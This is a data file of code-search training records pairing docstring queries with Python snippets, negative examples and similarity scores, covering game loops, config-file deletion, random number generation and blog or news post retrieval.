"0.6137042",
"0.61360174",
"0.61170506",
"0.6105377",
"0.6103171"
] |
0.70450854
|
0
|
This is used to quickly jump to the GameOver Loop from the Code Explorer
|
def GAMEOVER_LOOP():
pass
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def play_game():\n pass",
"def play_game():\n pass",
"def GAME_LOOP():\n pass",
"def jump(self):\n print(\"Inside ElfRider.jump\")",
"def jumped_on(self):\r\n pass",
"def event_game_over(self):\n print('Game over!')\n self._cmd_exit()",
"def Gameloop():",
"def draw_game_over(self):\n output = \"Game Over!\"\n arcade.draw_text(output, 250, 400, arcade.color.BLACK, 54)\n\n output = \"Click to restart\"\n arcade.draw_text(output, 330, 200, arcade.color.BLACK, 24)",
"def gameOver():\n PTS, COIN, LIVES = 0, 1, 2\n uniSprite = 0\n globalSound(\"stop\") # Stopping any music\n playSound(overSound, \"music\") # Playing game over music\n startTime = time.get_ticks()\n # Game over screen should only stay for 5 seconds\n while time.get_ticks() - startTime < 5000:\n for evnt in event.get():\n if evnt.type == QUIT:\n return \"exit\"\n # Drawing game over screen\n screen.fill(BLACK)\n uniSprite = spriteCounter(uniSprite)\n drawStats(None, None, marioScore[PTS], marioScore[COIN], time.get_ticks(), levelNum, True, True, statCoin,\n uniSprite, 0)\n screen.blit(overText,(300,300)) # Blitting game over text\n display.flip()\n fpsCounter.tick(60)\n return \"menu\"",
"def game_play(self):",
"def start_new_game(word, max_tries):\n\n # replace the pass statement with your code\n pass",
"def play(self):\n print('Playing game...')",
"def oneGame():\n playOneGame()",
"def game_loop(self):\n self.interface.game_loop(self)",
"def home(self):\n self.goto(0, 0)",
"def start_game(self):\n\n\t\tpass",
"def next(self):\n \n jump = 0\n \n for event in pudding.process_event():\n if event[0] == sdlconst.KEYDOWN:\n if (event[1] == sdlconst.K_q) or (event[1] == sdlconst.K_ESCAPE):\n tofu.GAME_INTERFACE.end_game() # Quit the game\n \n elif event[1] == sdlconst.K_m:\n print \"trying to change single to multiplayer mode\"\n tofu.GAME_INTERFACE.end_game('client')\n \n elif event[1] == sdlconst.K_LSHIFT:\n # Shift key is for jumping\n # Contrary to other action, jump is only performed once, at the beginning of\n # the jump.\n jump = 1\n \n elif event[1] == sdlconst.K_LEFT: self.left_key_down = 1\n elif event[1] == sdlconst.K_RIGHT: self.right_key_down = 1\n elif event[1] == sdlconst.K_UP: self.up_key_down = 1\n elif event[1] == sdlconst.K_DOWN: self.down_key_down = 1\n \n elif event[0] == sdlconst.KEYUP:\n if event[1] == sdlconst.K_LEFT: self.left_key_down = 0\n elif event[1] == sdlconst.K_RIGHT: self.right_key_down = 0\n elif event[1] == sdlconst.K_UP: self.up_key_down = 0\n elif event[1] == sdlconst.K_DOWN: self.down_key_down = 0\n \n if jump: return Action(ACTION_JUMP)\n \n # People saying that Python doesn't have switch/select case are wrong...\n # Remember this if you are coding a fighting game !\n return Action({\n (0, 0, 1, 0) : ACTION_ADVANCE,\n (1, 0, 1, 0) : ACTION_ADVANCE_LEFT,\n (0, 1, 1, 0) : ACTION_ADVANCE_RIGHT,\n (1, 0, 0, 0) : ACTION_TURN_LEFT,\n (0, 1, 0, 0) : ACTION_TURN_RIGHT,\n (0, 0, 0, 1) : ACTION_GO_BACK,\n (1, 0, 0, 1) : ACTION_GO_BACK_LEFT,\n (0, 1, 0, 1) : ACTION_GO_BACK_RIGHT,\n }.get((self.left_key_down, self.right_key_down, self.up_key_down, self.down_key_down), ACTION_WAIT))",
"def enter_loop(self):\n if (self.tape.current_cell()==0):\n # Jump past the end.\n self.instruction_pointer = (self.jump_map[self.instruction_pointer])\n else:\n pass",
"def breakout_loop(self):\n while self.playing:\n self.handle_events()\n self.update()\n if self.game_over:\n self.current_menu = self.fail_menu\n self.playing = False\n self.reset()\n self.draw()",
"def main():\n game = TinkerGame()\n game.setup()\n while game.calculate_points() > 0 and not game.game_over:\n game.play()\n game.end()",
"def game_over(self):\n if self.alive:\n return\n\n self.screen.fill(Color.BLACK)\n self.draw_text(\n \"GAME OVER\", WIN_CENTER, font=FONT_M, size=48, color=Color.WHITE\n )\n again = \"Press any key to play again\"\n again_pos = CENTER_W, WIN_H - BLOCK_H\n self.draw_text(again, again_pos, color=Color.WHITE)\n\n pygame.display.flip()\n self.wait_keydown()\n\n if self.running:\n self.reset()",
"def start_game():\n logger.info(\"Clicking play button\")\n mouseclick(coords_play_final_button[0], coords_play_final_button[1])",
"def gameover(self):\n font = pygame.font.Font(None, CASE_SIZE)\n text = font.render('Game over!', True,(255, 255, 255), (0, 0, 0))\n self.screen.blit(text,(CASE_SIZE * 6, CASE_SIZE * 7))\n self.try_again()\n pygame.display.flip()",
"def start(self):\n running = True\n while running:\n k=self.Game.playgame()\n if k=='Exit':\n running = False\n continue\n elif k=='resume':\n continue\n elif k=='GameOver':\n o=self.gameover()\n if o=='newgame':\n self.Game=Game(self.Display)\n else:\n running = False\n while k=='Won':\n o=self.won()\n if o=='newgame':\n self.Game=Game(self.Display)\n break\n elif o==\"Exit\":\n output = self.Game.popup()\n if output == 'resume':\n self.Game.GameBoard.display()\n continue\n else:\n running = True\n break",
"def print_game_over():\n print()\n print(\" _____ __ __ ______ ______ ________ _____ \")\n print(r\" / ____| /\\ | \\/ | ____| / __ \\ \\ / / ____| __ \\ \")\n print(r\" | | __ / \\ | \\ / | |__ | | | \\ \\ / /| |__ | |__) |\")\n print(r\" | | |_ | / /\\ \\ | |\\/| | __| | | | |\\ \\/ / | __| | _ / \")\n print(r\" | |__| |/ ____ \\| | | | |____ | |__| | \\ / | |____| | \\ \\ \")\n print(r\" \\_____/_/ \\_\\_| |_|______| \\____/ \\/ |______|_| \\_\\\\\")\n print()",
"def main_tunnel():\r\n print 'yay you beat the boss'",
"def throwaway():\n print \"Nothing to execute (how about writing some code?)\"",
"def start_of_game(self):\n pass",
"def main():\n game = Hangman()\n game.play_hangman()",
"def showGameOver():\n\n #On créer une nouvelle fenetre\n win = createNewWin(curses)\n\n #On affiche le texte\n win.addstr(1, 4, 'GAME OVER', curses.color_pair(3))\n win.addstr(2, 4, 'Your Score', curses.color_pair(1)) \n win.addstr(3, 4, '%s - %s' %(game.player.name, game.player.score), curses.color_pair(1))\n win.addstr(4, 4, 'Press 1 to return previous menu', curses.color_pair(1))\n win.addstr(5, 4, '')\n\n #Ajout dans le highscore\n game.highscore.addHighScore(game.player.name, game.player.score)\n game.highscore.writeHighScore()\n\n key = 0\n #Tant que la touche 1 n'est pas pressée...\n #while key!= 343 or key!=10:\n while key != ord('1'):\n #On attend et on 'hook' les touches\n key = win.getch()\n\n #Si on sort de la boucle (1), alors on\n #détruit les fenetres\n destroyWin()\n\n #A la fin de la partie (game over), on affiche l'écran \n menu()"
] |
[
"0.69013184",
"0.6685942",
"0.667838",
"0.64479417",
"0.6389033",
"0.63500315",
"0.6268412",
"0.6247274",
"0.6208292",
"0.62065697",
"0.61782795",
"0.61727744",
"0.61709315",
"0.6155323",
"0.6140036",
"0.61322534",
"0.60895646",
"0.60741645",
"0.6071158",
"0.6070823",
"0.60639673",
"0.6050934",
"0.6041921",
"0.6015854",
"0.601326",
"0.599678",
"0.599234",
"0.59880006",
"0.5986197",
"0.59833443"
] |
0.779364
|
0
|
Delete the config file
|
def clean():
Log.d(DEBUG_TAG, "Delete config file...")
try:
os.remove(CONFIG_FILE)
except os.error as e:
Log.e(DEBUG_TAG, "Delete config file%s error, reason:%s"%(CONFIG_FILE, e))
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"async def before_cleanup(self, invoker: PluginInvoker):\n config_file = invoker.files[\"config\"]\n try:\n config_file.unlink()\n except FileNotFoundError:\n pass\n logging.debug(f\"Deleted configuration at {config_file}\")",
"def remove_config(name):\n db = dbm.open(config_file, 'c')\n del db[name]\n db.close()",
"def remove_stored_config(self):\n stored_config_filename = self.stored_config_filename\n if stored_config_filename.exists():\n stored_config_filename.remove()\n self._stored_cmake_generator = self._stored_config.cmake_generator",
"def del_conf(self, path):\n\t\tself.monitor.removePath(path)\n\t\tself.cache.pop(path, None)",
"def removeConfigFile(alg):\r\n configPath = alg.getParameterValue('config')\r\n if isWindows():\r\n command = \"DEL {}\".format(os.path.join(rliPath(), configPath))\r\n else:\r\n command = \"rm {}\".format(os.path.join(rliPath(), configPath))\r\n alg.commands.append(command)",
"def remove_user_configuration(self):\n shutil.rmtree(self.test.user_conf_dir())",
"def delete(self):\n\t\t#self.log.info(\"Deleting file {}\".format(self._filepath))\n\t\tos.remove(self._filepath)",
"def do_DELETE(self): # pylint: disable=C0103\r\n if self.path == \"/del_config\" or self.path == \"/del_config/\":\r\n self.server.config = dict()\r\n self.log_message(\"Reset Server Configuration.\")\r\n self.send_response(200)\r\n else:\r\n self.send_response(404)",
"def remove_prompt(name, delete_config):\n\n with open(DATABASE_FILE_PATH) as f:\n config = json.load(f)\n path = config[name]\n del config[name]\n\n with open(DATABASE_FILE_PATH, 'w') as f:\n json.dump(config, f)\n\n if delete_config:\n os.remove(path)",
"def delete(configsetname):\n cnfset = configsetPath(configsetname)\n files = os.listdir(cnfset)\n for f in files: os.remove(os.path.join(cnfset, f))\n os.rmdir(cnfset)\n return None",
"def delete(self):\n\n try:\n remove(self.file)\n except OSError:\n pass",
"def remove_local_config(self):\n with ignored(OSError):\n os.remove(os.path.join(self.rundir, const.LOCAL_CONFIG_FILE))",
"def delete_db(self):\n import os.path\n os.remove(self.filepath)",
"def delete(self, filename):\n pass",
"def delete(self):\n if os.path.exists(self.file_path):\n os.remove(self.file_path)",
"def tearDown(self) -> None:\n os.remove(TestConfigFile.TEST_CONFIG)",
"def clear_config():\n check_config()\n fs.truncate(PYWS_DIR_BIN)",
"def delete_directory_config(DirectoryName=None):\n pass",
"def cleanup(self):\n\t\tfor filename in self.cfg_files:\n\t\t\tif os.path.isfile(filename):\n\t\t\t\tsize = os.stat(filename)[6]\n\t\t\t\tif size == 0:\n\t\t\t\t\tos.remove(filename)\n\n\t\treturn True",
"def cleanup(self):\n self.qemu.clean_run_files()\n for tmp in glob.glob(self.configfile + \"?*\"):\n os.unlink(tmp)",
"def delete(self, name):\n path = self.directory / f\"{name}.yaml\"\n if path.exists():\n path.unlink()",
"def delete_config_callback(self, trigger_id, config):\n self.tcex.log.trace('delete config callback')",
"def delete(self):\r\n return self.connection.delete_launch_configuration(self.name)",
"def kubeconfig_delete(self):\n\n self._client.delete(\n \"{}/kubeconfig\".format(LKECluster.api_endpoint), model=self\n )",
"def delete( self ):\n if os.path.exists(self.filename):\n os.remove(self.filename)",
"def delete_endpoint_config(EndpointConfigName=None):\n pass",
"def remove(ctx, name, project_root):\n\n if name == 'logme':\n raise LogmeError(\"'logme' master logger configuration cannot be removed!\")\n\n with ensure_conf_exist(project_root) as logme_conf:\n\n config = read_config(logme_conf)\n config.remove_section(name)\n\n with logme_conf.open('w+') as conf:\n config.write(conf)",
"def delete(self):\n try:\n self._client.delete_launch_configuration(LaunchConfigurationName=self._name)\n except botocore.exceptions.ClientError as e:\n if \"not found\" in e.response[\"Error\"][\"Message\"]:\n logger.warn(\"Launch configuration %s not found\", self._name)\n else:\n raise",
"def remove_config(self, config):\n for fn in config:\n try:\n os.remove(fn)\n LOGGER.debug('Removed backup: %s', fn)\n\n except IOError as e:\n if e.errno != errno.ENOENT:\n LOGGER.warning('Could not remove backup: %s', fn)",
"def clear(self):\r\n del self.__config\r\n self.__config = {}\r\n self.save()"
] |
[
"0.74366903",
"0.7346777",
"0.7211751",
"0.71800804",
"0.7114096",
"0.6960528",
"0.69506925",
"0.6919178",
"0.6889668",
"0.6852701",
"0.6828853",
"0.6788664",
"0.6766707",
"0.67503726",
"0.6749905",
"0.6742663",
"0.67349917",
"0.6699292",
"0.66893643",
"0.66805387",
"0.6654045",
"0.6620899",
"0.6620314",
"0.66074663",
"0.6602094",
"0.65775836",
"0.65525806",
"0.65289545",
"0.6521301",
"0.65143955"
] |
0.8400627
|
0
|
Generates a random number or array based on an uniform distribution.
|
def generate_uniform_random_number(low=0.0, high=1.0, size=1):
uniform_array = np.random.uniform(low, high, size)
return uniform_array
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def discrete_uniform_sampler(upper_value):\n return int(np.random.random() * upper_value)",
"def uniform_random (d, num_samples=None):\n \n return build_uniform_random (d, num_samples=num_samples)",
"def generate_random_data(min_, max_, len_):\n return np.random.uniform(min_, max_, len_)",
"def _gen_random_number() -> float:\n return uniform(0, 1000)",
"def _uniform(val_range):\r\n return np.random.uniform(val_range[0], val_range[1])",
"def glorot_uniform(seed=None):\n return lambda shape, dtype, batch_ndims=0: _initialize( # pylint: disable=g-long-lambda\n shape, dtype, batch_ndims,\n scale=1., mode='fan_avg', distribution='uniform', seed=seed)",
"def random(self, lower, upper, shape):\n return np.random.uniform(lower, upper, shape)",
"def random(self, lower, upper, shape):\n return np.random.uniform(lower, upper, shape)",
"def he_uniform(seed=None):\n # pylint: disable=line-too-long\n # pylint: enable=line-too-long\n return lambda shape, dtype, batch_ndims=0: _initialize( # pylint: disable=g-long-lambda\n shape, dtype, batch_ndims,\n scale=2., mode='fan_in', distribution='uniform', seed=seed)",
"def uniform_sample(x):\n return np.random.choice(x)",
"def random_distribution():\n b = np.random.uniform(0.0, 1.0, size=[1, vocabulary_size])\n return b / np.sum(b, 1)[:, None]",
"def random():\r\n return R.NextDouble()",
"def uniform(lower, upper):\n\n return lower + random.random() * (upper - lower)",
"def random_distribution():\n b = np.random.uniform(0.0, 1.0, size=[1, vocabulary_size])\n return b/np.sum(b, 1)[:,None]",
"def random_distribution():\n b = np.random.uniform(0.0, 1.0, size=[1, vocabulary_size])\n return b/np.sum(b, 1)[:,None]",
"def uniform_sample(upper, num):\n sample = []\n for i in range(num):\n value = random.randint(0, upper - 1)\n sample.append(value)\n return sample",
"def sample_uniform():\n global samples_uniform, isample_uniform\n\n # sample of U(0, 1)\n u = samples_uniform[isample_uniform]\n\n # moving to next index of samples global array\n isample_uniform += 1\n if isample_uniform >= len(samples_uniform):\n # exhausted all samples -> re-drawing samples from U(0, 1)\n samples_uniform = np.random.uniform(size=SIZE_SAMPLES_UNIFORM)\n isample_uniform = 0\n\n return u",
"def uniform(low, high, size, dtype=np.float32):\n rng = np.random.default_rng(0)\n out = (high - low) * rng.random(size, dtype=dtype) + low\n return out",
"def uniform(random_state, size=None, low=0.0, high=1.0, ndim=None, dtype=None):\r\n low = tensor.as_tensor_variable(low)\r\n high = tensor.as_tensor_variable(high)\r\n if dtype is None:\r\n dtype = tensor.scal.upcast(theano.config.floatX, low.dtype, high.dtype)\r\n ndim, size, bcast = _infer_ndim_bcast(ndim, size, low, high)\r\n op = RandomFunction('uniform',\r\n tensor.TensorType(dtype=dtype, broadcastable=bcast))\r\n return op(random_state, size, low, high)",
"def generate_value(loc, data):\n return np.random.randint(100, size=1)",
"def uniform(self, size=None, low=0.0, high=1.0, ndim=None, dtype=None):\r\n return self.gen(uniform, size, low, high, ndim=ndim, dtype=dtype)",
"def random_normal():\r\n return inverse_normal_cdf(random.random())",
"def sample_uniform(instance, params):\n subpop = np.random.randint(params['N'])\n return sample_from_subpop(instance, params, subpop)",
"def test_uniform(self):\r\n # Check over two calls to see if the random state is correctly updated.\r\n m = Module()\r\n m.random = RandomStreams(utt.fetch_seed())\r\n m.fn = Method([], m.random.uniform((2,2), -1, 1))\r\n\r\n made = m.make()\r\n made.random.initialize()\r\n fn_val0 = made.fn()\r\n fn_val1 = made.fn()\r\n print fn_val0\r\n print fn_val1\r\n\r\n rng_seed = numpy.random.RandomState(utt.fetch_seed()).randint(2**30)\r\n rng = numpy.random.RandomState(int(rng_seed)) #int() is for 32bit\r\n\r\n numpy_val0 = rng.uniform(-1, 1, size=(2,2))\r\n numpy_val1 = rng.uniform(-1, 1, size=(2,2))\r\n print numpy_val0\r\n print numpy_val1\r\n\r\n assert numpy.allclose(fn_val0, numpy_val0)\r\n assert numpy.allclose(fn_val1, numpy_val1)",
"def get_random_uniform(m,n):\n\n return 2*np.random.random(size=(m,n)) - 1",
"def sample(self):\n u = np.asarray(np.random.uniform())\n return self.invert(u)",
"def rand_gauss(n=100, mu=[1, 1], sigma=[0.1, 0.1]):\n d = len(mu)\n res = np.random.randn(n, d)\n return np.array(res * sigma + mu)",
"def random_normal():\n return inverse_normal_cdf(random.random())",
"def rng():\n return numpy.random.default_rng(564)",
"def uniform(stdev, size):\n return numpy.random.uniform(\n low=-stdev * numpy.sqrt(3),\n high=stdev * numpy.sqrt(3),\n size=size\n ).astype(theano.config.floatX)"
] |
[
"0.7219819",
"0.7165851",
"0.7116001",
"0.70992416",
"0.708078",
"0.70510674",
"0.70472604",
"0.70472604",
"0.70045674",
"0.69709945",
"0.6946136",
"0.69459814",
"0.6933979",
"0.692469",
"0.692469",
"0.69243973",
"0.6828493",
"0.6742964",
"0.6704405",
"0.6655175",
"0.66233355",
"0.6611306",
"0.6595284",
"0.65936863",
"0.6587113",
"0.65787715",
"0.6566365",
"0.6563974",
"0.6538504",
"0.6528314"
] |
0.71848965
|
1
|
Get all the posts that are of type NEWS
|
def get_news(request):
return get_all_posts(request, PostType.NEWS)
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def get_posts(self, published=False) -> Type[QuerySet]:\n categories = self.get_descendant_categories()\n posts = Post.objects.filter(categories__in=categories)\n if published:\n posts = posts.filter(published__lte=timezone.now())\n return posts",
"def get_all_posts(request, show_only=None):\n if(show_only == None):\n posts = Post.objects.filter(published_date__lte=timezone.now()).order_by('-is_important', '-published_date')\n title = \"All Posts\"\n else:\n posts = Post.objects.filter(post_type__exact=show_only.name).filter(published_date__lte=timezone.now()).order_by('-is_important', '-published_date')\n title = show_only.name\n return render(request, \"posts.html\", {\"posts\": posts, \"title\": title})",
"def published_posts(self) -> Type[QuerySet]:\n return Post.objects.filter(published__lt=timezone.now()).order_by('-published')",
"def get(self):\n return get_all_posts()",
"def recent_posts(self, horizon: int=30) -> Type[QuerySet]:\n delta = timezone.timedelta(horizon)\n start_date = timezone.now() - delta\n return self.published_posts().filter(published__gte=start_date)",
"def get_posts(self):\n return self.blog_posts.all()",
"def get_posts(url):\r\n feed = feedparser.parse(url)\r\n return feed.entries",
"def get_remote_news_items(self):\n items = []\n params = {\n \"base_url\": self.osha_json_url,\n \"lang\": api.portal.get_tool(\"portal_languages\").getPreferredLanguage(),\n \"query_tags\": self.remote_news_query_tags,\n }\n qurl = \"{base_url}/{lang}/services/hw/news/{query_tags}\".format(**params)\n result = urlopen(qurl)\n if result.code == 200:\n json = load(result)\n for node in json.get(\"nodes\"):\n item = node.get(\"node\")\n pd = item.get('publication_date', '')\n items.append({\n 'remote_item': True,\n 'Title': item['title'],\n 'Date': (\n pd and DateTime(pd, datefmt=\"international\").strftime(\n \"%Y/%m/%d %H:%M\") or \"\"),\n 'getURL': item.get('path'),\n 'path': item.get('path'),\n 'Description': item.get('summary', '') or item.get('body', ''),\n 'text': item.get('summary', '') and item.get('body', '') or '',\n 'remote_image': item.get('image', ''),\n 'node_id': item.get('nid'),\n })\n return items",
"def get_posts(wp):\n from wordpress_xmlrpc.methods.posts import GetPosts\n\n all_posts = []\n\n offset = 0\n increment = 20\n while True:\n posts = wp.call(GetPosts({'number': increment, 'offset': offset, 'post_type': 'post'}))\n if len(posts) == 0:\n break # no more posts returned\n for post in posts:\n all_posts.append(post)\n\n offset = offset + increment\n\n return all_posts",
"def articles(self):\n articles = Post.objects.live().descendant_of(self)\n articles = articles.order_by('-date')\n\n return articles",
"def new_posts(self, number_posts=5) -> Type[QuerySet]:\n return self.published_posts()[:number_posts]",
"def get_posts_from_post_type(context, post_type=''):\n qs = Post.objects.public()\n\n if not post_type:\n obj = context['object']\n if hasattr(obj, 'post_type'):\n post_type = obj.post_type\n\n if isinstance(post_type, basestring):\n qs = qs.filter(post_type__post_type_slug=post_type)\n else:\n qs = qs.filter(post_type=post_type)\n\n return qs",
"async def getposts(ctx, theme):\n q = Query(limit=100, tag=\"travelfeed\")\n for post in Discussions_by_created(q):\n continent_code = get_location(post['body'], \"continentcode\")\n link = \"https://steemit.com/\"+construct_authorperm(post['author'], post['permlink'])\n if post['author'] in curatorlist or post['author'] in whitelist:\n continue\n elif (continent_code == \"AF\" or continent_code == \"OC\" or continent_code == \"AN\") and (theme == \"Africa\" or theme == \"Oceania\" or theme ==\"Australia\" or theme == \"australiaoceaniaafrica\"):\n await bot.say(link)\n elif continent_code == \"AS\" and theme == \"Asia\":\n await bot.say(link)\n elif continent_code == \"EU\" and theme == \"Europe\":\n await bot.say(link)\n elif (continent_code == \"SA\" or continent_code == \"NA\") and theme == \"America\":\n await bot.say(link)\n elif (\"food\" in post['body'] or \"eat\" in post['body'] or \"restaurant\" in post['body']) and (theme == \"Food\" or theme ==\"foodoftheworld\"):\n await bot.say(link)\n elif (\"advice\" in post['body'] or \"budget\" in post['body'] or \"learn\" in post['body']) and (theme == \"Advice\" or theme == \"Travel Advice\" or theme == \"traveladvice\"):\n await bot.say(link)",
"def extract_instagram_posts(self, nodes):\n posts = []\n for node in nodes:\n try:\n post = dict()\n post['dimensions'] = dict()\n post['dimensions']['width'] = node['node']['dimensions']['width']\n post['dimensions']['height'] = node['node']['dimensions']['height']\n post['user'] = self.extract_owner_details(node['node'][\"owner\"])\n post['postId'] = node['node']['id']\n post['code'] = node['node']['shortcode']\n post['caption'] = node['node']['edge_media_to_caption']['edges'][0]['node']['text'] if len(\n node['node']['edge_media_to_caption']['edges']) > 0 else None\n if post['caption'] is not None:\n post['hashTags'] = [re.sub(r'\\W+', '', word) for word in post['caption'].split() if\n word.startswith(\"#\")]\n else:\n post['hashTags'] = []\n post['comments'] = node['node']['edge_media_to_comment']\n post['likes'] = node['node']['edge_liked_by']\n post['imgSmall'] = node['node'][\"thumbnail_src\"]\n post['imgLarge'] = node['node'][\"display_url\"]\n post['postedAt'] = node['node'][\"taken_at_timestamp\"]\n post['isVideo'] = node['node'][\"is_video\"]\n\n if not set(post['hashTags']).isdisjoint(set(_config['instagram']['excluded'])):\n # contains blocked hashtag, skip\n continue\n\n posts.append(post)\n except KeyError as e:\n log.error(\"Problems parsing post {}\".format(str(e)))\n return posts",
"def get_all_posts_from_collection(self):\n response = self.get_comments_all_posts(PAYLOAD)\n collection = (response.json())\n return collection",
"def iter_all_posts(self, limit=None): # new\n feed = self.get_feed(limit=999999)\n posts = feed[\"threads\"]\n if limit:\n posts = posts[:limit]\n for post in posts:\n yield post",
"def get_queryset(self):\n return Post.objects.filter(published_date__isnull=True).order_by('created_date')",
"def get_posts(self): #return list of posts that are associated with this blog_id\n return Post.find_posts_for_blog_id(self.blog_id) #this will return a list of posts objects",
"def related_posts(self, number_items=5, include_ancestors=True) -> Type[QuerySet]:\n if include_ancestors:\n categories = Category.objects.get_queryset_ancestors(self.categories.get_queryset())\n else:\n categories = self.categories.get_queryset()\n posts = Post.objects.published_posts().exclude(pk=self.pk).filter(categories__in=categories).order_by('?')[:number_items]\n return posts",
"def get_queryset(self):\n return Post.objects.filter(published_date__lte=timezone.now()).order_by('-published_date')",
"def get_queryset(self):\n return Post.objects.filter(published_date__lte=timezone.now()).order_by('-published_date')",
"def get_posts():\n url = app.config['POSTS_ENDPOINT']\n response = requests.get(url, params={})\n if response.status_code == 200:\n return parse_posts(response.json())\n raise RuntimeError('Error in retrieving posts.')",
"def recent_posts(self):\n\n try:\n jsondoc = json.load(urllib.urlopen(\"http://reddit.com/user/%s.json\" % self.username))\n except:\n raise self.DoesNotExist\n \n posts = []\n for item in jsondoc['data']['children']:\n if item['kind'] == 't1':\n posts.append(Comment(item['data']))\n elif item['kind'] == 't3':\n posts.append(item['data'])\n\n return posts",
"def get_all_posts(self, *fields):\n if fields:\n posts = self.collection.find(projection=fields)\n else:\n posts = self.collection.find()\n\n for post in posts.sort('created_datetime', -1):\n yield BlogPost(\n title=post['title'],\n content=post['content'],\n created_datetime=post['created_datetime']\n )",
"def post_list(request):\n # Only show the posts that have been published\n posts = Post.objects.filter(date_published__isnull=False)\n return render(request,\n 'blog/post_list.html',\n {'posts': posts}\n )",
"def _filter_posts(posts):\n\n return filter(_filter_post, posts)",
"def show_all_posts():\n post = Post.query.all()\n\n return render_template('all-posts.html', post=post)",
"def get_posts(self):\n return Post.select().where (Post.user == self)",
"def show_news_list():\r\n\tnews_list = Page.objects.filter(tags='news').order_by('-created')\r\n\treturn {'news_list': news_list}",
"def get_queryset(self):\n\t\treturn Post.objects.order_by('-pub_date')[:5]"
] |
[
"0.6337393",
"0.6113393",
"0.60611385",
"0.60267586",
"0.6009277",
"0.59933615",
"0.59903824",
"0.58913356",
"0.5810465",
"0.5692559",
"0.5685967",
"0.565168",
"0.5642692",
"0.56090117",
"0.5573423",
"0.55714744",
"0.5566585",
"0.55500364",
"0.5540304",
"0.5528783",
"0.5528783",
"0.5523624",
"0.55138284",
"0.5508864",
"0.5498508",
"0.54798925",
"0.5467636",
"0.5462718",
"0.54179394",
"0.5417362"
] |
0.65027636
|
0
|
Get all the posts that are of type BLOG
|
def get_blogs(request):
return get_all_posts(request, PostType.BLOG)
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def get_posts(self):\n return self.blog_posts.all()",
"def get_all_blogs(cls):\n blogs = Database.find(collection='blogs',\n query={})\n #blogs will be a dictionary of blogs at this point\n return [cls.__dict_to_class(blog) for blog in blogs] #return a list of blog objects",
"def get_bloglist_by_category(cat):\n key = KEY_CAT_PREFIX + str(cat.id)\n blogs = RedisHelper.get_cache(key)\n if RedisHelper.is_cache_exist(key) is False:\n blogs = Article.objects.filter(category=cat, active=True).order_by('-publish_time')\n RedisHelper.create_cache(key, blogs, RedisTimeOut.REDIS_TIMEOUT_1_DAYS)\n return blogs",
"def all_blogs(request):\n\n posts = Post.objects.all()\n\n context = {\n 'posts': posts\n }\n\n return render(request, 'blog/blog.html', context)",
"def get(self):\n return get_all_blogs()",
"def listBlogs(self): #$NON-NLS-1$\r\n atomRequest = self._createListBlogsRequest()\r\n self._sendAtomRequest(atomRequest)\r\n blogList = atomRequest.getBlogList()\r\n del atomRequest\r\n self._debug(u\"Atom List Blogs - returned a list of %d blogs.\" % len(blogList)) #$NON-NLS-1$\r\n return blogList",
"def get_bloglist_by_tag(tag):\n key = KEY_TAG_PREFIX + str(tag.id)\n blogs = RedisHelper.get_cache(key)\n if RedisHelper.is_cache_exist(key) is False:\n blogs = tag.article_set.filter(active=True).order_by('-publish_time')\n RedisHelper.create_cache(key, blogs, RedisTimeOut.REDIS_TIMEOUT_1_DAYS)\n return blogs",
"def get_posts(self): #return list of posts that are associated with this blog_id\n return Post.find_posts_for_blog_id(self.blog_id) #this will return a list of posts objects",
"def get_blog_posts(self, params=None):\n _url = urljoin(self.base_url, self.API_POSTS)\n return requests.get(_url, params=params)",
"def get_queryset(self):\n return models.BlogPost.objects.filter(blog__slug=self.kwargs['slug'])",
"def get_posts(self, published=False) -> Type[QuerySet]:\n categories = self.get_descendant_categories()\n posts = Post.objects.filter(categories__in=categories)\n if published:\n posts = posts.filter(published__lte=timezone.now())\n return posts",
"async def get_blogs(self) -> List:\n parsed_blogs = []\n GRAPHQL_PAYLOAD[\"variables\"][\"tagSlug\"] = self.tag\n GRAPHQL_PAYLOAD[\"variables\"][\"paging\"][\"to\"] = str(self.start_index)\n current_datetime = int(datetime.timestamp(datetime.now()))\n post_id_url_map = {}\n response = await aiohttp_request(\n request_type=\"POST\", url=MEDIUM_GRAPHQL_URL,\n data=GRAPHQL_PAYLOAD\n )\n blogs = response[\"json\"].get(\"data\", {}).get(\"tagFeed\", {})\n if blogs:\n for blog in blogs.get(\"items\", []):\n post_date = datetime.fromtimestamp(blog[\"post\"][\"firstPublishedAt\"] // 1000)\n post_created_on = (current_datetime - (blog[\"post\"][\"firstPublishedAt\"] // 1000)) // (60 * 60)\n parsed_blogs.append(\n {\n # Blog DB Data\n \"post_id\": blog[\"post\"][\"id\"],\n \"title\": blog[\"post\"][\"title\"],\n \"blog_desc\": blog[\"post\"][\"previewContent\"][\"subtitle\"],\n \"blog_data\": \"\",\n \"blog_link\": blog[\"post\"][\"mediumUrl\"],\n \"created_time\": post_date.isoformat(),\n \"read_time\": ceil(blog[\"post\"][\"readingTime\"]),\n \"tags\": self.tag,\n # Author DB Data\n \"author_id\": blog[\"post\"][\"creator\"][\"id\"],\n \"creator\": blog[\"post\"][\"creator\"][\"name\"],\n # Extra Meta\n \"post_created_time\": post_created_on,\n }\n )\n post_id_url_map[blog[\"post\"][\"id\"]] = blog[\"post\"][\"mediumUrl\"]\n\n await bulk_update_to_redis(post_id_url_map)\n push_data_to_db(parsed_blogs)\n\n return parsed_blogs",
"def show_blog_list():\r\n\tblog_list = Page.objects.filter(page_type=3).order_by('-created')[:4]\r\n\treturn {'blog_list': blog_list}",
"def get_all_posts(self):\n cur = self.conn.cursor()\n\n query = 'SELECT blog.blog_id as id, blog.title as title, ' \\\n 'blog.subtitle as subtitle, ' \\\n 'blog.content as content, blog.date as date, ' \\\n 'author.name as author ' \\\n 'FROM blog, author ' \\\n 'WHERE blog.author_id = author.author_id ' \\\n 'ORDER BY blog_id DESC '\n\n posts = []\n cur.execute(query)\n\n for row in cur.fetchall():\n posts.append(dict(row))\n\n return posts",
"def list_blogs(self, **filters):\n\t\tresult = self.client.get(self._endpoint + \"/blog\", params=filters)\n\t\treturn PaginatedList(result, Blog, (self.user_id, self.site_id), \"blog_id\")",
